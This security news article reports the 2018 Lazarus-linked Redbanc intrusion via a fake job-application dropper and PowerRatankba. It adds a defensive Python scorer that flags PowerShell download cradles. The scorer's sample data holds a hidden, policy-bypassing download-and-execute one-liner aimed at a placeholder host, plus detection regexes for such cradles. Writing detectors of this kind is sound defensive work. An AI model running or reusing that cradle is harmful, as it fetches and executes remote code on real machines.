The recently disclosed cyber attack on the Chilean interbank network Redbanc, which took place in December 2018, may have been carried out by the North Korea-linked advanced persistent threat (APT) group Lazarus.
The attack involved PowerRatankba, a malware toolkit with ties to the APT group, and represents the latest known example of Lazarus-affiliated tools being deployed in financially motivated activity targeting financial institutions in Latin America, Flashpoint researchers said in a blog post.
The intrusion reportedly occurred when the malware was delivered via a trusted Redbanc IT professional who clicked a link to apply for a job opening found through social media. The applicant was ultimately and unwittingly tricked into executing the payload, researchers said.
The malware’s dropper displays as a job application form while it downloads and executes PowerRatankba.
Flashpoint researchers described the dropper sample as a Microsoft Visual C#/Basic .NET (v4.0.30319)-compiled executable that contains the logic to contact the server and download PowerRatankba, a PowerShell reconnaissance tool.
“Lazarus attacks appear to reportedly rely on social media and trusted relationships, which may elevate their abilities to execute and install their payloads,” the post said. “As such, security awareness training—especially that which pertains to social media and social engineering—is also recommended.”
Proofpoint researchers, in a separate post, described PowerRatankba as a newer reconnaissance and downloader implant tool leveraged by Lazarus to fingerprint and obtain information about compromised machines.
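The two descriptions above (a .NET dropper that downloads and runs a PowerShell tool, and PowerRatankba as a PowerShell reconnaissance and downloader implant) point at a generic detection opportunity for defenders: an executable launched from a user-writable location spawning PowerShell with a download-and-execute command line and window-hiding or policy-bypass flags. The following Python scorer is an added example written for this article, not Flashpoint's or Proofpoint's tooling; the process-creation events, file paths, user names and URL it runs over are constructed placeholders, not indicators from the Redbanc incident.

```python
"""Score process-creation events for a PowerShell download-cradle pattern.

Added illustration; every event below is constructed sample data, not telemetry
from the Redbanc intrusion or any indicator published by the researchers."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / EDR style)."""
    parent_image: str
    image: str
    command_line: str
    user: str


POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: one benign admin script, one dropper-like chain,
# one unrelated cmd.exe launch.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", POWERSHELL,
              "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
              "CORP\\admin"),
    ProcEvent(r"C:\Users\jdoe\Downloads\JobApplication.exe", POWERSHELL,
              "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
              "-Command \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://placeholder.invalid/form')\"",
              "CORP\\jdoe"),  # placeholder URL, not a real indicator
    ProcEvent(r"C:\Program Files\Vendor\app.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", "CORP\\jdoe"),
]

# Cmdlets and flags commonly seen in PowerShell download-and-execute one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b|frombase64string)",
    re.I)
# Flags that hide the console or disable script-policy checks.
EVASION_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-ex(ecutionpolicy)?\s+bypass)", re.I)
# Parent binaries living in user-writable locations (downloads, temp, desktop).
USER_PATH = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\", re.I)


def score_event(ev: ProcEvent):
    """Return (score, reasons) for one event; only PowerShell children are scored."""
    reasons = []
    if not ev.image.lower().endswith("powershell.exe"):
        return 0, reasons
    if USER_PATH.search(ev.parent_image):
        reasons.append("parent launched from user-writable path")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        reasons.append("download/execute cradle in command line")
    if EVASION_FLAGS.search(ev.command_line):
        reasons.append("hidden window or execution-policy bypass flag")
    return len(reasons), reasons


def find_suspicious(events, threshold: int = 2):
    """Return events whose score reaches the threshold, with the matched reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"parent": ev.parent_image, "user": ev.user,
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"[{hit['score']}] {hit['user']} <- {hit['parent']}: "
              + "; ".join(hit["reasons"]))
```

The threshold of two signals keeps a lone `-NoProfile` or a signed vendor script from firing, while the dropper-like chain scores on all three; in production the same logic would sit on a SIEM's process-creation feed rather than on an in-memory list.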